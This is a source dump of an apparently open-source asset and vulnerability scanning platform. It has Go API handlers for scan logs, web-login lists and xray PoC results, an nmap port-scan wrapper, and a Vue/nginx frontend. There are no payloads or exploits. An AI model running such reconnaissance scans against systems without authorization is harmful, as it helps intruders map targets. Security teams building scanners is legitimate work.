name 20 | } 21 | 22 | code := e.SUCCESS 23 | 24 | data["lists"] = models.GetLog(utils.GetPage(c), 10, maps) 25 | data["total"] = models.GetLogTotal(maps) 26 | 27 | c.JSON(http.StatusOK, gin.H{ 28 | "code": code, 29 | "msg": e.GetMsg(code), 30 | "data": data, 31 | }) 32 | } 33 | -------------------------------------------------------------------------------- /routers/api/v1/webloginlist.go: -------------------------------------------------------------------------------- 1 | package v1 2 | 3 | import ( 4 | "github.com/gin-gonic/gin" 5 | "linglong/models" 6 | "linglong/pkg/e" 7 | "linglong/pkg/utils" 8 | "net/http" 9 | ) 10 | 11 | func GetWebloginlist(c *gin.Context) { 12 | title := c.Query("title") 13 | 14 | maps := make(map[string]interface{}) 15 | data := make(map[string]interface{}) 16 | 17 | if title != "" { 18 | maps["title"] = title 19 | } 20 | 21 | 22 | code := e.SUCCESS 23 | 24 | data["lists"] = models.GetWebloginlist(utils.GetPage(c), 10, maps) 25 | data["total"] = models.GetWebloginlistTotal(maps) 26 | 27 | c.JSON(http.StatusOK, gin.H{ 28 | "code": code, 29 | "msg": e.GetMsg(code), 30 | "data": data, 31 | }) 32 | } 33 | 34 | //查询 35 | //func GetWebloginlistSearch(c *gin.Context) { 36 | // code := e.INVALID_PARAMS 37 | // valid := validation.Validation{} 38 | // data := make(map[string]interface{}) 39 | // maps := make(map[string]interface{}) 40 | // title := c.Query("title") 41 | // 42 | // if ! 
valid.HasErrors() { 43 | // data["lists"] = models.GetWebloginlist(utils.GetPage(c), 10, maps,title) 44 | // data["total"] = models.GetWebloginlistTotal(maps) 45 | // code = e.SUCCESS 46 | // } else { 47 | // for _, err := range valid.Errors { 48 | // log.Printf("err.key: %s, err.message: %s", err.Key, err.Message) 49 | // } 50 | // } 51 | // 52 | // c.JSON(http.StatusOK, gin.H{ 53 | // "code": code, 54 | // "msg": e.GetMsg(code), 55 | // "data": data, 56 | // }) 57 | //} 58 | -------------------------------------------------------------------------------- /routers/api/v1/xrayres.go: -------------------------------------------------------------------------------- 1 | package v1 2 | 3 | import ( 4 | "github.com/astaxie/beego/validation" 5 | "github.com/gin-gonic/gin" 6 | "github.com/unknwon/com" 7 | "linglong/models" 8 | "linglong/pkg/e" 9 | "linglong/pkg/utils" 10 | "net/http" 11 | ) 12 | 13 | func GetXrayres(c *gin.Context) { 14 | url := c.Query("url") 15 | poc := c.Query("poc") 16 | snapshot := c.Query("snapshot") 17 | 18 | maps := make(map[string]interface{}) 19 | data := make(map[string]interface{}) 20 | 21 | if url != "" { 22 | maps["url"] = url 23 | } 24 | if poc != "" { 25 | maps["poc"] = poc 26 | } 27 | if snapshot != "" { 28 | maps["snapshot"] = snapshot 29 | } 30 | 31 | code := e.SUCCESS 32 | 33 | data["lists"] = models.GetXrayres(utils.GetPage(c), 10, maps) 34 | data["total"] = models.GetXrayresTotal(maps) 35 | 36 | c.JSON(http.StatusOK, gin.H{ 37 | "code": code, 38 | "msg": e.GetMsg(code), 39 | "data": data, 40 | }) 41 | } 42 | 43 | func DeleteXrayres(c *gin.Context) { 44 | 45 | id := com.StrTo(c.Param("id")).MustInt() 46 | valid := validation.Validation{} 47 | valid.Required(id, "id").Message("id不能为空") 48 | 49 | code := e.INVALID_PARAMS 50 | if !valid.HasErrors() { 51 | models.DeleteXrayres(id) 52 | code = e.SUCCESS 53 | 54 | } 55 | 56 | c.JSON(http.StatusOK, gin.H{ 57 | "code": code, 58 | "msg": e.GetMsg(code), 59 | "data": make(map[string]string), 60 
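})

}
-------------------------------------------------------------------------------- /routers/tools/nmap/nmap.go: --------------------------------------------------------------------------------
package nmap

import (
	"context"
	"log"
	"strconv"
	"time"

	"github.com/Ullaakut/nmap"
)

// scanTimeout bounds a single nmap run. The original value is kept unchanged;
// a bound this loose mainly guards against a hung nmap process, not a slow one.
const scanTimeout = 1000 * time.Minute

// NmapScan runs nmap against ip/port with host discovery skipped (-Pn) and
// returns the address, port number and service name of the first open port
// it finds, or three empty strings when nothing is open or the scan fails.
//
// Failures are logged and reported through the empty result instead of
// terminating the process: this runs inside the web service, so a single bad
// target, a missing nmap binary or a transient error must not take the whole
// server down (the previous log.Fatalf did exactly that).
func NmapScan(ip string, port string) (resip, resport, resprotocol string) {
	ctx, cancel := context.WithTimeout(context.Background(), scanTimeout)
	defer cancel()

	scanner, err := nmap.NewScanner(
		nmap.WithTargets(ip),
		nmap.WithPorts(port),
		nmap.WithContext(ctx),
		// -Pn: skip the ping probe; hosts that drop ICMP would otherwise be
		// reported as down and never port-scanned.
		nmap.WithSkipHostDiscovery(),
	)
	if err != nil {
		log.Printf("unable to create nmap scanner for %s:%s: %v", ip, port, err)
		return
	}

	result, warnings, err := scanner.Run()
	if err != nil {
		log.Printf("unable to run nmap scan for %s:%s: %v", ip, port, err)
		return
	}
	if warnings != nil {
		log.Printf("Warnings: \n %v", warnings)
	}

	// Report the first open port of the first host that has both ports and an
	// address. Every port is inspected: previously the loop returned after the
	// first port regardless of state, so a closed or filtered first entry hid
	// any open port later in the list.
	for _, host := range result.Hosts {
		if len(host.Ports) == 0 || len(host.Addresses) == 0 {
			continue
		}
		for _, p := range host.Ports {
			if p.State.State != "open" {
				continue
			}
			service := p.Service.Name
			if service == "microsoft-ds" {
				service = "SMB" // friendlier label for the 445/tcp service
			}
			return host.Addresses[0].String(), strconv.Itoa(int(p.ID)), service
		}
	}
	return
}
-------------------------------------------------------------------------------- /web/.env: --------------------------------------------------------------------------------
VUE_APP_BASE_API = '/api/v1'

-------------------------------------------------------------------------------- /web/Dockerfile: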
-------------------------------------------------------------------------------- 1 | #FROM node:latest as build-stage 2 | # 3 | #MAINTAINER drunk_kk 4 | # 5 | #RUN npm install -g cnpm --registry=https://registry.npm.taobao.org 6 | # 7 | #WORKDIR /app 8 | # 9 | #COPY . . 10 | # 11 | #RUN rm -rf node_modules \ 12 | # && npm install node-sass \ 13 | # && cnpm run build 14 | 15 | FROM nginx:1.15.3-alpine as production-stage 16 | 17 | COPY ./nginx.conf /etc/nginx/nginx.conf 18 | 19 | COPY ./dist /usr/share/nginx/html 20 | #COPY --from=build-stage /app/dist /usr/share/nginx/html 21 | 22 | EXPOSE 8001 23 | 24 | CMD ["nginx", "-g", "daemon off;"] 25 | -------------------------------------------------------------------------------- /web/babel.config.js: -------------------------------------------------------------------------------- 1 | module.exports = { 2 | presets: [ 3 | '@vue/cli-plugin-babel/preset' 4 | ], 5 | plugins: [ 6 | [ 7 | 'component', 8 | { 9 | libraryName: 'element-ui', 10 | styleLibraryName: 'theme-chalk' 11 | } 12 | ] 13 | ] 14 | } 15 | -------------------------------------------------------------------------------- /web/dist/12.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/dist/12.png -------------------------------------------------------------------------------- /web/dist/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/dist/favicon.ico -------------------------------------------------------------------------------- /web/dist/fonts/element-icons.535877f5.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/dist/fonts/element-icons.535877f5.woff 
-------------------------------------------------------------------------------- /web/dist/fonts/element-icons.732389de.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/dist/fonts/element-icons.732389de.ttf -------------------------------------------------------------------------------- /web/dist/img/all.ba8c4734.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/dist/img/all.ba8c4734.png -------------------------------------------------------------------------------- /web/dist/img/bg.8e171a3c.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/dist/img/bg.8e171a3c.png -------------------------------------------------------------------------------- /web/dist/img/ipall.777d2626.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/dist/img/ipall.777d2626.png -------------------------------------------------------------------------------- /web/dist/img/logo.46db48c9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/dist/img/logo.46db48c9.png -------------------------------------------------------------------------------- /web/dist/index.html: -------------------------------------------------------------------------------- 1 | web
-------------------------------------------------------------------------------- /web/nginx.conf: -------------------------------------------------------------------------------- 1 | 2 | #user nobody; 3 | worker_processes 1; 4 | events { 5 | worker_connections 1024; 6 | } 7 | 8 | 9 | http { 10 | include mime.types; 11 | default_type application/octet-stream; 12 | sendfile on; 13 | #tcp_nopush on; 14 | 15 | #keepalive_timeout 0; 16 | keepalive_timeout 65; 17 | 18 | #gzip on; 19 | gzip on; 20 | gzip_min_length 5k; 21 | gzip_buffers 4 16k; 22 | #gzip_http_version 1.0; 23 | gzip_comp_level 3; 24 | gzip_types text/plain application/javascript application/x-javascript text/css application/xml text/javascript application/x-httpd-php image/jpeg image/gif image/png; 25 | gzip_vary on; 26 | 27 | server { 28 | listen 8001; 29 | server_name localhost; 30 | 31 | location / { 32 | index index.html index.htm; #添加属性。 33 | root /usr/share/nginx/html; #站点目录 34 | } 35 | 36 | location /api/ { 37 | proxy_set_header Host $http_host; 38 | proxy_set_header X-Real-IP $remote_addr; 39 | proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; 40 | proxy_set_header X-Forwarded-Proto $scheme; 41 | proxy_pass http://127.0.0.1:18000/api/; 42 | } 43 | 44 | error_page 500 502 503 504 /50x.html; 45 | location = /50x.html { 46 | root /usr/share/nginx/html; 47 | } 48 | 49 | } 50 | 51 | } 52 | -------------------------------------------------------------------------------- /web/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "web", 3 | "version": "0.1.0", 4 | "private": true, 5 | "scripts": { 6 | "serve": "vue-cli-service serve", 7 | "build": "vue-cli-service build", 8 | "lint": "vue-cli-service lint" 9 | }, 10 | "dependencies": { 11 | "@tweenjs/tween.js": "^18.6.0", 12 | "axios": "^0.19.2", 13 | "core-js": "^3.6.5", 14 | "echarts": "^4.8.0", 15 | "element-ui": "^2.4.5", 16 | "less": "^3.11.3", 17 | "less-loader": "^6.1.1", 18 | 
"moment": "^2.27.0", 19 | "node-sass": "^4.14.1", 20 | "qs": "^6.9.4", 21 | "vue": "^2.6.11", 22 | "vue-count-to": "^1.0.13", 23 | "vue-router": "^3.2.0" 24 | }, 25 | "devDependencies": { 26 | "@vue/cli-plugin-babel": "~4.4.0", 27 | "@vue/cli-plugin-router": "~4.4.0", 28 | "@vue/cli-service": "~4.4.0", 29 | "babel-plugin-component": "^1.1.1", 30 | "sass-loader": "^10.0.1", 31 | "vue-cli-plugin-element": "^1.0.1", 32 | "vue-template-compiler": "^2.6.11" 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /web/public/12.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/public/12.png -------------------------------------------------------------------------------- /web/public/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/public/favicon.ico -------------------------------------------------------------------------------- /web/public/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | <%= htmlWebpackPlugin.options.title %> 9 | 10 | 11 | 14 |
15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /web/server-config.js: -------------------------------------------------------------------------------- 1 | const isProd = process.env.NODE_ENV === 'production' 2 | // const localhost = 'http://127.0.0.1:9090/' 3 | const baseUrl = process.env.VUE_APP_API_URL 4 | const api = baseUrl 5 | export default { 6 | isProd, 7 | api 8 | } 9 | -------------------------------------------------------------------------------- /web/src/App.vue: -------------------------------------------------------------------------------- 1 | 8 | 14 | 15 | 17 | -------------------------------------------------------------------------------- /web/src/assets/all.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/src/assets/all.png -------------------------------------------------------------------------------- /web/src/assets/css/global.css: -------------------------------------------------------------------------------- 1 | /* 全局样式表 */ 2 | html, 3 | body, 4 | #app { 5 | height: 100%; 6 | margin:0; 7 | padding:0; 8 | } 9 | 10 | .el-breadcrumb{ 11 | margin-bottom: 15px; 12 | font-size: 13px; 13 | } 14 | 15 | .el-card{ 16 | box-shadow: 0 1px 1px rgba(0, 0, 0, 0.15) !important; 17 | } 18 | .el-table{ 19 | margin-top: 15px; 20 | font-size: 12px; 21 | } 22 | .el-pagination{ 23 | margin-top: 15px; 24 | } 25 | /* .el-cascader-menu { 26 | height: 300px; 27 | } */ 28 | .el-steps{ 29 | margin: 15px 0px; 30 | } 31 | 32 | .el-step__title { 33 | font-size: 12px; 34 | } 35 | .quill-editor{ 36 | height: 260px; 37 | } -------------------------------------------------------------------------------- /web/src/assets/fonts/iconfont.eot: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/src/assets/fonts/iconfont.eot -------------------------------------------------------------------------------- /web/src/assets/fonts/iconfont.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/src/assets/fonts/iconfont.ttf -------------------------------------------------------------------------------- /web/src/assets/fonts/iconfont.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/src/assets/fonts/iconfont.woff -------------------------------------------------------------------------------- /web/src/assets/img/bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/src/assets/img/bg.png -------------------------------------------------------------------------------- /web/src/assets/img/btn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/src/assets/img/btn.png -------------------------------------------------------------------------------- /web/src/assets/ipall.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/src/assets/ipall.png -------------------------------------------------------------------------------- /web/src/assets/login.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/src/assets/login.png -------------------------------------------------------------------------------- /web/src/assets/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/src/assets/logo.png -------------------------------------------------------------------------------- /web/src/assets/vuln.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/src/assets/vuln.png -------------------------------------------------------------------------------- /web/src/views/About.vue: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /web/src/views/Home.vue: -------------------------------------------------------------------------------- 1 | 7 | 8 | 19 | -------------------------------------------------------------------------------- /web/vue.config.js: -------------------------------------------------------------------------------- 1 | module.exports = { 2 | 3 | devServer: { 4 | 5 | disableHostCheck: true 6 | 7 | }, 8 | 9 | } 10 | -------------------------------------------------------------------------------- /漏洞报告.xlsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/漏洞报告.xlsx --------------------------------------------------------------------------------